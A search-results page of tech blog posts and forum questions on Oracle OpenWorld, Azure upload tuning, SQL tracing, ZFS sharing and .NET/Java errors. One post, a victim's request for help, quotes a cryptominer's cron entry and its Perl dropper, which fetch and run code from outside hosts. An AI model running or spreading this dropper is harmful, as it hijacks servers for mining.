Search Results

Search found 95201 results on 3809 pages for 'system data sqlite'.


  • Oracle OpenWorld 2013 – Wrap up by Sven Bernhardt

    - by JuergenKress
    OOW 2013 is over and we're heading home, so it is time to lean back and reflect on our impressions of the conference. First of all: OOW was great! It was a pleasure to be a part of it. As already mentioned in our last blog article, it was the biggest OOW ever. In parallel to the conference, the America's Cup took place in San Francisco, and Oracle Team USA won. An amazing job by the team, and again congratulations from our side.

    Back to the conference. The main topics for us were:

      - Oracle SOA / BPM Suite 12c
      - Adaptive Case Management (ACM)
      - Big Data
      - Fast Data
      - Cloud
      - Mobile

    Below we go into a little more detail on the key takeaways for each of these points.

    Oracle SOA / BPM Suite 12c: During the five days at OOW, the first details of the upcoming major releases of Oracle SOA Suite 12c and Oracle BPM Suite 12c were introduced. Some new key features are:

      - Managed File Transfer (MFT) for transferring big files from a source to a target location
      - Enhanced REST support through a new REST binding
      - A generic cloud adapter, which can be used to connect to different cloud providers, like Salesforce
      - Enhanced analytics with BAM, which has been totally reengineered (the BAM Console now also runs in Firefox!)
      - Templates (OSB pipelines, component templates, BPEL activity templates)
      - Enterprise Manager as a single monitoring console
      - OSB design-time integration into JDeveloper (really great!)
      - Enterprise modeling capabilities in BPM Composer

    These are only a few of the things coming with 12c. We are really looking forward to the new release, because this seems to be really great stuff. The suite is becoming more and more integrated. From 10g to 11g it was an evolution in terms of developing SOA-based applications; with 12c, Oracle continues on its way. Very impressive.

    Adaptive Case Management: Another fantastic topic was Adaptive Case Management (ACM). The Oracle PMs did a great job, especially at the demo grounds, in showing the upcoming Case Management UI (which will be available in 11g with the next BPM Suite MLR patch), the roadmap, and the differences from traditional business process modeling. They were very busy during the conference because a lot of partners and customers were interested.

    Big Data: Big Data is one of the current hype themes. Because of the huge amounts of data coming from different internal and external sources, handling that data becomes more and more challenging. Companies need to analyze their data to optimize their business, and the challenge is that the amount of data grows daily. To store and analyze the data efficiently, a scalable and flexible infrastructure is necessary, and it is important that hardware and software are engineered to work together. To that end, several new features of Oracle Database 12c, like the new in-memory option, were presented by Larry Ellison himself. On the hardware side, new server machines like the Fujitsu M10 and new processors, such as Oracle's new M6-32, were announced. The performance improvements when using this hardware in connection with the improved software solutions were really impressive. For more details, please take a look at our previous blog post.

    Regarding Big Data, Oracle also introduced their Big Data architecture, which consists of:

      - Oracle Big Data Appliance, which comes preconfigured with Hadoop
      - Oracle Exadata, which stores huge amounts of data efficiently to achieve optimal query performance
      - Oracle Exalytics as a fast and scalable business analytics system

    Analysis of the stored data can be performed using SQL, by streaming the data directly from Hadoop to an Oracle Database 12c. Alternatively, the analysis can be implemented directly in Hadoop using "R". In addition, the Oracle BI tools can be used to analyze the data.

    Fast Data: Fast Data is a complementary approach to Big Data. A huge amount of mostly unstructured data comes in via different channels at a high frequency. Analyzing these data streams is also important for companies, because the incoming data has to be checked for business-relevant patterns in real time, and these patterns must be identified efficiently and with good performance. Here, in-memory grid solutions in combination with Oracle Coherence and Oracle Event Processing demonstrated very impressively how efficient real-time data processing can be. One example of a Fast Data solution shown during OOW was the analysis of Twitter streams for customer satisfaction: feeds with negative words like "bad" or "worse" were filtered, and after a defined threshold was reached within a certain timeframe, a business event was triggered.

    Cloud: Another key trend in the IT market is, of course, Cloud Computing and what it means for companies and their businesses. Oracle announced their Cloud strategy and vision: companies can focus on their real business while all of their applications are available via the Cloud. This also includes Oracle Database and Oracle WebLogic, so that companies can build, deploy and run their own applications within the Cloud. Three different approaches were introduced:

      - Infrastructure as a Service (IaaS)
      - Platform as a Service (PaaS)
      - Software as a Service (SaaS)

    With the IaaS approach, only the infrastructure components are managed in the Cloud. Customers are very flexible regarding memory, storage or the number of CPUs, because those parameters can be adjusted elastically. The PaaS approach means that, besides the infrastructure, the platforms necessary for running applications (such as databases or application servers) are also provided within the Cloud. Here customers can also decide whether installation and management of these components should be done by Oracle. The SaaS approach is the most complete one: all the applications a company uses are managed in the Cloud. Oracle is planning to provide all of their applications, like ERP systems or HR applications, as Cloud services.

    In conclusion, this seems to be a very forward-thinking strategy, which opens up new possibilities for customers to manage their infrastructure and applications in a flexible, scalable and future-oriented manner. As you can see, our OOW days have been very interesting. We collected a lot of helpful information for our projects. The innovations presented at the conference are great, and being part of this was even greater! We are looking forward to next year's conference!

    Links:
    http://www.oracle.com/openworld/index.html
    http://thecattlecrew.wordpress.com/2013/09/23/first-impressions-from-oracle-open-world-2013

    SOA & BPM Partner Community: For regular information on Oracle SOA Suite, become a member of the SOA & BPM Partner Community. For registration please visit www.oracle.com/goto/emea/soa (OPN account required). If you need support with your account, please contact the Oracle Partner Business Center.

    Technorati Tags: cattleCrew, Sven Bernhard, OOW2013, SOA Community, Oracle SOA, Oracle BPM, Community, OPN, Jürgen Kress


  • External File Upload Optimizations for Windows Azure

    - by rgillen
    [Cross posted from here: http://rob.gillenfamily.net/post/External-File-Upload-Optimizations-for-Windows-Azure.aspx]

    I'm wrapping up a bit of the work we've been doing on data movement optimizations for cloud computing, and the latest set of data yielded some interesting points I thought I'd share. The work done here is not really rocket science but may, in some ways, be slightly counter-intuitive and therefore seemed worthy of posting.

    Summary: for those who don't like to read detailed posts or don't have time, the synopsis is that if you are uploading data to Azure, block your data (even down to 1MB) and upload in parallel. Set your block size based on your source file size, but if you must choose a fixed value, use 1MB. Following the above will result in significant performance gains: upwards of 10x-24x, and a reduction in overall file transfer time of upwards of 90% (e.g., uploading a 1GB file averaged 46.37 minutes prior to optimizations and 1.86 minutes afterwards).

    Detail: For those of you who want more detail, or think that the claims at the end of the preceding paragraph are over-reaching, what follows is information and code supporting those claims. As the title would indicate, these tests were run from our research facility pointing to the Azure cloud (specifically US North Central, as it is physically closest to us) and do not represent intra-cloud results. (We have performed intra-cloud tests; the overall results are similar in notion, but the data rates are significantly different, as are the tipping points for the various block sizes. This will be detailed separately.)

    We started by building a very simple console application that would loop through a directory and upload each file to Azure storage. This application used the shipping storage client library from the 1.1 version of the Azure tools. The only real variation from the client library is that we added code to collect and record the duration (in ms) and size (in bytes) for each file transferred. The code is available here. We then created a directory holding a collection of files of the following sizes: 2KB, 32KB, 64KB, 128KB, 512KB, 1MB, 5MB, 10MB, 25MB, 50MB, 100MB, 250MB, 500MB, 750MB, and 1GB (50 files for each size listed). These files contained randomly-generated binary data and do not benefit from compression (a separate discussion topic). Our file generation tool is available here.

    The baseline was established by running the application described above against the directory containing all of the data files. This application uploads the files in a random order so as to avoid transferring all of the files of a given size sequentially, thereby spreading the effects of periodic Internet delays across the collection of results. We then ran some scripts to split the resulting data and generate some reports. The raw data collected for our non-optimized tests is available via the links in the Related Resources section at the bottom of this post. For each file size, we calculated the average upload time (and standard deviation) and the average transfer rate (and standard deviation). As you likely are aware, transferring data across the Internet is susceptible to many transient delays which can cause anomalies in the resulting data. It is for this reason that we randomized the order of source file processing as well as executed the tests 50x for each file size. We expect that these steps yielded a sufficiently balanced set of results.

    Once the baseline was collected and analyzed, we updated the test harness application with some methods to split the source file into user-defined block sizes and then upload those blocks in parallel (using the PutBlock() method of Azure storage). The parallelization was handled by simply relying on the Parallel Extensions to .NET to provide a Parallel.For loop (see linked source for specific implementation details in Program.cs, line 173 and following; less than 100 lines total). Once all of the blocks were uploaded, we called PutBlockList() to assemble/commit the file in Azure storage. For each block transferred, the MD5 was calculated and sent, ensuring that the bits that arrived matched what was intended. The timer for the blocked/parallelized transfer method wraps the entire process (source file splitting, block transfer, MD5 validation, file committal). A diagram of the process is as follows:

    We then tested the effects of blocking & parallelizing the transfers by running the updated application against the same source set, doing a parameter sweep on the block size including 256KB, 512KB, 1MB, 2MB, and 4MB (our assumption was that anything lower than 256KB wasn't worth the trouble, and 4MB is the maximum size of a block supported by Azure). The raw data for the parallel tests is available via the links in the Related Resources section at the bottom of this post. This data was processed and then compared against the single-threaded / non-optimized transfer numbers, and the results were encouraging. The Excel version of the results is available here.

    Two semi-obvious points need to be made prior to reviewing the data. The first is that if the block size is larger than the source file size, you will end up with a "negative optimization" due to the overhead of attempting to block and parallelize. The second is that as the files get smaller, the clock-time cost of blocking and parallelizing (overhead) is more apparent and can tend towards negative optimizations. For this reason (and as supported by the raw data provided in the linked worksheet), the charts and dialog below ignore source file sizes less than 1MB.

    (click chart for full size image)

    The chart above illustrates some interesting points about the results:

      - When the block size is smaller than the source file, performance increases, but as the block size approaches and then passes the source file size, you see decreasing benefit to the point of negative gains (see the values for the 1MB file size).
      - For some of the moderately-sized source files, small blocks (256KB) are best.
      - As the size of the source file gets larger (see values for 50MB and up), the smallest block size is not the most efficient (presumably due, at least in part, to the increased number of blocks, the increased number of individual transfer requests, and reassembly/committal costs).
      - Once you pass the 250MB source file size, the difference in rate between 1MB and 4MB blocks is more-or-less constant.
      - The 1MB block size gives the best average improvement (~16x), but the optimal approach would be to vary the block size based on the size of the source file.

    (click chart for full size image)

    The above is another view of the same data as the prior chart, just with the axes changed (the x-axis represents file size, and the plotted data shows improvement by block size). It again highlights the fact that the 1MB block size is probably the best overall size, but also shows the benefits of some of the other block sizes at different source file sizes.

    This last chart shows the change in total duration of the file uploads based on different block sizes for the source file sizes. Nothing really new here, other than that this view of the data highlights the negative effects of poorly choosing a block size for smaller files.

    Summary: What we have found so far is that blocking your file uploads and uploading them in parallel results in significant performance improvements. Further, utilizing extension methods and the Task Parallel Library (.NET 4.0) makes short work of altering the shipping client library to provide this functionality while minimizing the amount of change to existing applications that might be using the client library for other interactions.

    Related Resources:
      - Source code for upload test application
      - Source code for random file generator
      - OData feed of raw data from non-optimized transfer tests (Experiment Metadata, Experiment Datasets, 2KB/32KB/64KB/128KB/256KB/512KB/1MB/5MB/10MB/25MB/50MB/100MB/250MB/500MB/750MB/1GB Uploads, Raw Data)
      - OData feeds of raw data from blocked/parallelized transfer tests (Experiment Metadata, Experiment Datasets, Raw Data, 256KB/512KB/1MB/2MB/4MB Blocks)
      - Excel worksheet showing summarizations and comparisons
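    To make the blocking-and-parallelizing approach concrete, here is a minimal sketch of the pattern described above. This is not the author's actual test harness (which is linked above); it assumes the v1.x Microsoft.WindowsAzure.StorageClient library, and the account string, container name and file path are placeholders:

        using System;
        using System.Collections.Generic;
        using System.IO;
        using System.Linq;
        using System.Security.Cryptography;
        using System.Threading.Tasks;
        using Microsoft.WindowsAzure;
        using Microsoft.WindowsAzure.StorageClient;

        class BlockUploader
        {
            static void Main()
            {
                const int blockSize = 1 * 1024 * 1024; // 1MB: the best fixed size per the tests above
                string path = @"c:\data\bigfile.dat";  // placeholder source file

                var account = CloudStorageAccount.Parse(
                    "DefaultEndpointsProtocol=https;AccountName=...;AccountKey=..."); // placeholder
                var blob = account.CreateCloudBlobClient()
                                  .GetContainerReference("uploads")
                                  .GetBlockBlobReference(Path.GetFileName(path));

                long fileLength = new FileInfo(path).Length;
                int blockCount = (int)((fileLength + blockSize - 1) / blockSize);

                // Block IDs must be base64 strings of uniform length.
                List<string> blockIds = Enumerable.Range(0, blockCount)
                    .Select(i => Convert.ToBase64String(BitConverter.GetBytes(i)))
                    .ToList();

                Parallel.For(0, blockCount, i =>
                {
                    // Each worker opens its own read-only stream so reads don't contend.
                    using (var fs = new FileStream(path, FileMode.Open, FileAccess.Read, FileShare.Read))
                    {
                        long offset = (long)i * blockSize;
                        var buffer = new byte[(int)Math.Min((long)blockSize, fileLength - offset)];
                        fs.Seek(offset, SeekOrigin.Begin);
                        int read = 0;
                        while (read < buffer.Length)
                            read += fs.Read(buffer, read, buffer.Length - read);

                        // Send the MD5 with the block so the service verifies what arrived.
                        string md5 = Convert.ToBase64String(MD5.Create().ComputeHash(buffer));
                        blob.PutBlock(blockIds[i], new MemoryStream(buffer), md5);
                    }
                });

                blob.PutBlockList(blockIds); // assemble/commit the blob
            }
        }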


  • Webcast: John Fowler Reveals The Next Step In Data Center Consolidation – June 27 At 10 AM PT

    - by Roxana Babiciu
    Completely integrated solutions are just better. But don't take our word for it - encourage your customers and prospects to join this live webcast featuring Oracle EVP John Fowler to find out why. Participants will learn how consolidating their existing data center to this new generation of solutions will simplify architectures, jump start application deployment and improve system performance - with easy self-service and private cloud capabilities.


  • How to record streaming camera video and auto-erase old data before drive fills up?

    - by nLinked
    I'm interested in making my own home CCTV system using Ubuntu. I want to get network cameras similar to this: http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&item=260745150596 I want a way to dump or record the live stream to a large hard drive, but have Ubuntu automatically delete the oldest parts of the video while the drive fills, so it can continue recording new data continuously. How can this auto-delete while recording be accomplished? I've searched and searched.


  • How are Reads Distributed in a Workload

    - by Bill Graziano
    People have uploaded nearly one million rows of trace data to TraceTune. That's enough data to start looking at the results in aggregate. The first thing I want to look at is logical reads. This is the easiest metric to identify and fix.

    When you upload a trace, I rank each statement based on the total number of logical reads. I also calculate each statement's percentage of the total logical reads. I do the same thing for CPU, duration and logical writes. When you view a statement you can see all the details like this: This single statement consumed 61.4% of the total logical reads on the system while we were tracing it.

    I also wanted to see the distribution of reads across statements. That graph looks like this: On average, the highest ranked statement consumed just under 50% of the reads on the system.

    When I tune a system, I'm usually starting in one of two modes: this "piece" is slow, or the whole system is slow. If a given piece (screen, report, query, etc.) is slow, you can usually find the specific statements behind it and tune them. You can make that individual piece faster, but you may not affect the whole system. When you're trying to speed up an entire server, you need to identify those queries that are using the most disk resources in aggregate. Fixing those will make them faster, and it will leave more disk throughput for the rest of the queries.

    Here are some of the things I've learned querying this data:

      - The highest ranked query averages just under 50% of the total reads on the system.
      - The top 3 ranked queries average 73% of the total reads on the system.
      - The top 10 ranked queries average 91% of the total reads on the system.

    Remember, these are averages across all the traces that have been uploaded. And I'm guessing that people mainly upload traces where there are performance problems, so your mileage may vary.

    I also learned that slow queries aren't the problem. Before I wrote ClearTrace I used to identify queries by filtering on high logical reads using Profiler. That picked out individual queries, but those rarely ran often enough to put a large load on the system. If you look at the execution count by rank, you'd see that the highest ranked queries also have the highest execution counts. The graph would look very similar to the one above but flatter. These queries don't look that bad individually but run so often that they hog the disk capacity.

    The takeaway from all this is that you really should be tuning the top 10 queries if you want to make your system faster. Tuning individually slow queries will help those specific queries but won't have much impact on the system as a whole.
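    To make the percentage math concrete, here is a small, purely illustrative C# sketch. It is hypothetical: TraceTune's real schema and code are not shown in the post, and the TraceRow shape is invented for the example. The aggregation boils down to grouping by statement, summing reads, and dividing by the grand total:

        using System;
        using System.Collections.Generic;
        using System.Linq;

        class TraceRow
        {
            public string StatementText;
            public long LogicalReads;
        }

        static class ReadRanking
        {
            static void Main()
            {
                var traceRows = new List<TraceRow>(); // load uploaded trace rows here

                // Group by statement, sum reads, rank by the total.
                var ranked = traceRows
                    .GroupBy(r => r.StatementText)
                    .Select(g => new { Stmt = g.Key,
                                       Reads = g.Sum(r => r.LogicalReads),
                                       Execs = g.Count() })
                    .OrderByDescending(x => x.Reads)
                    .ToList();

                long total = Math.Max(1L, ranked.Sum(x => x.Reads));

                // Each statement's share of all logical reads on the system.
                foreach (var x in ranked.Take(10))
                    Console.WriteLine("{0:F1}% over {1} executions: {2}",
                                      100.0 * x.Reads / total, x.Execs, x.Stmt);
            }
        }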


  • Welcome to ubiquitous file sharing (December 08, 2009)

    - by user12612012
    The core of any file server is its file system, and ZFS provides the foundation on which we have built our ubiquitous file sharing and single access control model. ZFS has a rich, Windows- and NFSv4-compatible ACL implementation (ZFS only uses ACLs), it understands both UNIX IDs and Windows SIDs, and it is integrated with the identity mapping service; it knows when a UNIX/NIS user and a Windows user are equivalent, and similarly for groups. We have a single access control architecture, regardless of whether you are accessing the system via NFS or SMB/CIFS.

    The NFS and SMB protocol services are also integrated with the identity mapping service, and shares are not restricted to UNIX permissions or Windows permissions. All access control is performed by ZFS, the system can always share file systems simultaneously over both protocols, and our model is native access to any share from either protocol.

    Modal architectures have unnecessary restrictions, confusing rules, administrative overhead and weird deployments to try to make them work; they exist as a compromise, not because they offer a benefit. Having some shares that only support UNIX permissions, others that only support ACLs, and some that support both in a quirky way really doesn't seem like the sort of thing you'd want in a multi-protocol file server. Perhaps because the server has been built on a file system that was designed for UNIX permissions, possibly with ACL support bolted on as an add-on afterthought, or because the protocol services are not truly integrated with the operating system, it may not be capable of supporting a single integrated model.

    With a single, integrated sharing and access control model:

    If you connect from Windows or another SMB/CIFS client:

      - The system creates a credential containing both your Windows identity and your UNIX/NIS identity. The credential includes UNIX/NIS IDs and SIDs, and UNIX/NIS groups and Windows groups.
      - If your Windows identity is mapped to an ephemeral ID, files created by you will be owned by your Windows identity (ZFS understands both UNIX IDs and Windows SIDs).
      - If your Windows identity is mapped to a real UNIX/NIS UID, files created by you will be owned by your UNIX/NIS identity.
      - If you access a file that you previously created from UNIX, the system will map your UNIX identity to your Windows identity and recognize that you are the owner. Identity mapping also supports access checking if you are being assessed for access via the ACL.

    If you connect via NFS (typically from a UNIX client):

      - The system creates a credential containing your UNIX/NIS identity (including groups).
      - Files you create will be owned by your UNIX/NIS identity.
      - If you access a file that you previously created from Windows and the file is owned by your UID, no mapping is required. Otherwise the system will map your Windows identity to your UNIX/NIS identity and recognize that you are the owner. Again, mapping is fully supported during ACL processing.

    The NFS, SMB/CIFS and ZFS services all work cooperatively to ensure that your UNIX identity and your Windows identity are equivalent when you access the system. This, along with the single ACL-based access control implementation, results in a system that provides that elusive ubiquitous file sharing experience.


  • How to apply Data Oriented Design with Object Oriented Programming?

    - by Pombal
    Hi. I've read lots of articles about DOD and I understand it, but I can't design an Object Oriented system with DOD in mind; I think my OOP education is blocking me. How should I think in order to mix the two? The objective is to have a nice OO interface while using DOD behind the scenes. I saw this too, but it didn't help much: http://stackoverflow.com/questions/3872354/how-to-apply-dop-and-keep-a-nice-user-interface


  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CentOS 6 server running some WordPress and Tomcat websites. In the last two days it has been crashing continuously. After investigation we found a kernelupdates binary consuming 100% CPU on the server. The process is shown below.

        ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

    But this seems not to be a valid kernel update. The server might be compromised and this process installed by a hacker, so I killed the process and removed the apache user's cron entries. But somehow the process started again after a couple of hours, and the cron entries were restored as well. I am searching for the thing that is modifying the cron jobs. Does this process belong to a mining operation? How can we stop the cron-job modification and clean out the source of this process?

    Cron entry (apache user):

        */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt

    The downloaded abc.txt script:

        #!/usr/bin/perl
        system("killall -9 minerd");
        system("killall -9 PWNEDa");
        system("killall -9 PWNEDb");
        system("killall -9 PWNEDc");
        system("killall -9 PWNEDd");
        system("killall -9 PWNEDe");
        system("killall -9 PWNEDg");
        system("killall -9 PWNEDm");
        system("killall -9 minerd64");
        system("killall -9 minerd32");
        system("killall -9 named");
        $rn=1;
        $ar=`uname -m`;
        while($rn==1 || $rn==0) {
            $rn=int(rand(11));
        }
        $exists=`ls /tmp/.ice-unix`;
        $cratch=`ps aux | grep -v grep | grep kernelupdates`;
        if($cratch=~/kernelupdates/gi) {
            die;
        }
        if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
            $wig=`wget --version | grep GNU`;
            if(length($wig>6)) {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            } else {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            }
        }
        @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
        $prt=0;
        while(length($prt)<4) {
            $prt=$prts[int(rand(19))-1];
        }
        print "setup for $rn:$prt done :-)\n";
        system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
        print "done!\n";

    Thanks in advance!
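    (Judging purely from the script quoted above, the answer to the mining question is almost certainly yes: "minerd" is the binary name of the cpuminer CPU miner, the renamed binary connects to stratum+tcp://hk2.wemineltc.com, which looks like a Litecoin mining pool endpoint, and the script first kills competing miner processes before reinstalling itself under /tmp/.ice-unix.)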


  • SQL Server - Physical connection is not usable Error Code: 19

    - by Harry
    Having trouble working out this SqlException: A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable) Any ideas what this is about? Couldn't get any hits on google or msdn on this one. The connection is MARS and Asynchronous in my own SQL pool. But don't get all excited about that - that is old code that has been stable for a long time! Exception details pasted below:

        System.Data.SqlClient.SqlException occurred
          Message=A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable)
          Source=.Net SqlClient Data Provider
          ErrorCode=-2146232060
          Class=20
          LineNumber=0
          Number=-1
          Server=SERVER
          State=0
          StackTrace:
            at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
            at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection)
            at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning()
            at System.Data.SqlClient.TdsParserStateObject.SNIWriteAsync(SNIHandle handle, SNIPacket packet, DbAsyncResult asyncResult)
            at System.Data.SqlClient.TdsParserStateObject.WriteSni()
            at System.Data.SqlClient.TdsParserStateObject.WritePacket(Byte flushMode)
            at System.Data.SqlClient.TdsParserStateObject.ExecuteFlush()
            at System.Data.SqlClient.TdsParser.TdsExecuteRPC(_SqlRPC[] rpcArray, Int32 timeout, Boolean inSchema, SqlNotificationRequest notificationRequest, TdsParserStateObject stateObj, Boolean isCommandProc)
            at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async)
            at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result)
            at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(DbAsyncResult result, String methodName, Boolean sendToPipe)
            at System.Data.SqlClient.SqlCommand.BeginExecuteNonQuery(AsyncCallback callback, Object stateObject)
            at CrawlAbout.Library.SQL.SQLAdapter.<ExecuteNonQueryTask>d__12.MoveNext() in D:\Work\Projects\CrawlAbout.com 2.0\CrawlAbout.Library.SQL\SQLAdapter.cs:line 149
          InnerException:


  • Use MTOM/streaming from C# calling a webservice in java exposed via jaxws

    - by raticulin
    We have this webservice created with JAX-WS:

        @WebService(name = "Mywebser", targetNamespace = "http://namespace")
        @MTOM(threshold = 2048)
        @SOAPBinding(style = SOAPBinding.Style.DOCUMENT, use = SOAPBinding.Use.LITERAL, parameterStyle = SOAPBinding.ParameterStyle.WRAPPED)
        public class Mywebser {
            @WebMethod(operationName = "doStreaming", action = "urn:doStreaming")
            @WebResult(name = "return")
            public ResultInfo doStreaming(String username, String pwd,
                    @XmlMimeType("application/octet-stream") DataHandler data, boolean overw) {
                ...
            }
        }

    The generated client side looks like this:

        @WebMethod(action = "urn:doStreaming")
        @WebResult(targetNamespace = "")
        @RequestWrapper(localName = "doStreaming", targetNamespace = "http://namespace", className = "com.mypack.client.doStreaming")
        @ResponseWrapper(localName = "doStreamingResponse", targetNamespace = "http://namespace", className = "com.mypack.client.doStreamingResponse")
        public ResultInfo doStreaming(
            @WebParam(name = "arg0", targetNamespace = "") String arg0,
            @WebParam(name = "arg1", targetNamespace = "") String arg1,
            @WebParam(name = "arg2", targetNamespace = "") DataHandler arg2,
            @WebParam(name = "arg3", targetNamespace = "") boolean arg3);

    Used this way, it streams properly (verified: we can pass an 80MB argument even when the JVM is allowed less memory):

        MywebserService serv = ...;
        Mywebser wso = serv.getMywebserPort(new MTOMFeature());
        Map<String, Object> ctxt = ((BindingProvider) wso).getRequestContext();
        ctxt.put(JAXWSProperties.HTTP_CLIENT_STREAMING_CHUNK_SIZE, 8192);
        DataHandler dataHandler = new DataHandler(new FileDataSource("c:\\temp\\A.dat"));
        arcres = wso.doStreaming("a", "b", dataHandler, true);

    When we generate a client for .NET with VS2008, using "Add Web Reference", we get this C# code:

        [System.Web.Services.Protocols.SoapDocumentMethodAttribute("urn:doStreaming", RequestNamespace="http://namespace", ResponseNamespace="http://namespace", Use=System.Web.Services.Description.SoapBindingUse.Literal, ParameterStyle=System.Web.Services.Protocols.SoapParameterStyle.Wrapped)]
        [return: System.Xml.Serialization.XmlElementAttribute("return", Form=System.Xml.Schema.XmlSchemaForm.Unqualified)]
        public ResultInfo doStreaming(
            [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] string arg0,
            [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] string arg1,
            [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified, DataType="base64Binary")] byte[] arg2,
            [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] bool arg3)

    Apparently this is not using streaming? The base64Binary type of arg2 seems not to be the right one; in Java it's a DataHandler. By testing with low memory on the Java side we can see it is not streaming, as it fails with an OOM. Does someone know if this is possible, and if so, how?

    Our environment:
      - server: JDK 1.6, JAX-WS 2.1.7
      - client: C# 2.0, Visual Studio 2008



  • How set EnqueueCallBack to my generic callback

    - by CrazyJoe
    using System;
    using System.Windows;
    using System.Windows.Controls;
    using System.Windows.Documents;
    using System.Windows.Ink;
    using System.Windows.Input;
    using System.Windows.Media;
    using System.Windows.Media.Animation;
    using System.Windows.Shapes;
    using Microsistec.Domain;
    using Microsistec.Client;
    using Microsoft.VisualStudio.TestTools.UnitTesting;
    using System.Collections.Generic;
    using Microsistec.Tools;
    using System.Json;
    using Microsistec.SystemConfig;
    using System.Threading;
    using Microsoft.Silverlight.Testing;

    namespace Test
    {
        [TestClass]
        public class SampleTest : SilverlightTest
        {
            [TestMethod, Asynchronous]
            public void login()
            {
                List<PostData> data = new List<PostData>();
                data.Add(new PostData("email", "xxx"));
                data.Add(new PostData("password", MD5.GetHashString("xxx")));
                WebClient.sendData(Config.DataServerURL + "/user/login", data, LoginCallBack);
                EnqueueCallback(?????????);
                EnqueueTestComplete();
            }

            [Asynchronous]
            public void LoginCallBack(object sender, System.Net.UploadStringCompletedEventArgs e)
            {
                string json = Microsistec.Client.WebClient.ProcessResult(e);
                var result = JsonArray.Parse(json);
                Assert.Equals("1", result["value"].ToString());
                TestComplete();
            }
        }
    }

    I'm trying to fill in the ????????? value, but my callback is generic; it is set up by my WebClient.sendData call. How do I wire my EnqueueCallback up to my existing LoginCallBack method?
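    (A sketch of the usual pattern with the Silverlight Unit Test Framework, not necessarily the answer the poster settled on: rather than passing the callback to EnqueueCallback, let the callback record its result and set a flag, then use EnqueueConditional to hold the test queue until the flag flips. This assumes sendData accepts any UploadStringCompleted-style handler.)

        private bool _done;
        private string _json;

        [TestMethod, Asynchronous]
        public void login()
        {
            List<PostData> data = new List<PostData>();
            data.Add(new PostData("email", "xxx"));
            data.Add(new PostData("password", MD5.GetHashString("xxx")));

            // The callback only records the result; assertions run on the test queue.
            WebClient.sendData(Config.DataServerURL + "/user/login", data,
                (sender, e) => { _json = Microsistec.Client.WebClient.ProcessResult(e); _done = true; });

            EnqueueConditional(() => _done);   // wait here until the callback has fired
            EnqueueCallback(() =>
            {
                var result = JsonArray.Parse(_json);
                Assert.AreEqual("1", result["value"].ToString()); // Assert.Equals is object.Equals, not an assertion
            });
            EnqueueTestComplete();
        }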


  • Trouble running setup package after Publishing in Visual Studio 2008

    - by Andrew Cooper
    I've got a small WinForms application that runs fine in the IDE. It builds with no errors or warnings, and it's not using any third-party controls. I'm coding in C# in Visual Studio 2008.

    When I Build > Publish the application, everything seems to work fine. However, when I attempt to install the application via the setup.exe file, I get an error message that says "Application cannot be started." The error details are below:

        ERROR DETAILS
        Following errors were detected during this operation.
        * [3/18/2010 10:50:56 AM] System.Runtime.InteropServices.COMException
          - The referenced assembly is not installed on your system. (Exception from HRESULT: 0x800736B3)
          - Source: System.Deployment
          - Stack trace:
            at System.Deployment.Internal.Isolation.IStore.GetAssemblyInformation(UInt32 Flags, IDefinitionIdentity DefinitionIdentity, Guid& riid)
            at System.Deployment.Internal.Isolation.Store.GetAssemblyManifest(UInt32 Flags, IDefinitionIdentity DefinitionIdentity)
            at System.Deployment.Application.ComponentStore.GetAssemblyManifest(DefinitionIdentity asmId)
            at System.Deployment.Application.ComponentStore.GetSubscriptionStateInternal(DefinitionIdentity subId)
            at System.Deployment.Application.SubscriptionStore.GetSubscriptionStateInternal(SubscriptionState subState)
            at System.Deployment.Application.ComponentStore.CollectCrossGroupApplications(Uri codebaseUri, DefinitionIdentity deploymentIdentity, Boolean& identityGroupFound, Boolean& locationGroupFound, String& identityGroupProductName)
            at System.Deployment.Application.SubscriptionStore.CommitApplication(SubscriptionState& subState, CommitApplicationParams commitParams)
            at System.Deployment.Application.ApplicationActivator.InstallApplication(SubscriptionState& subState, ActivationDescription actDesc)
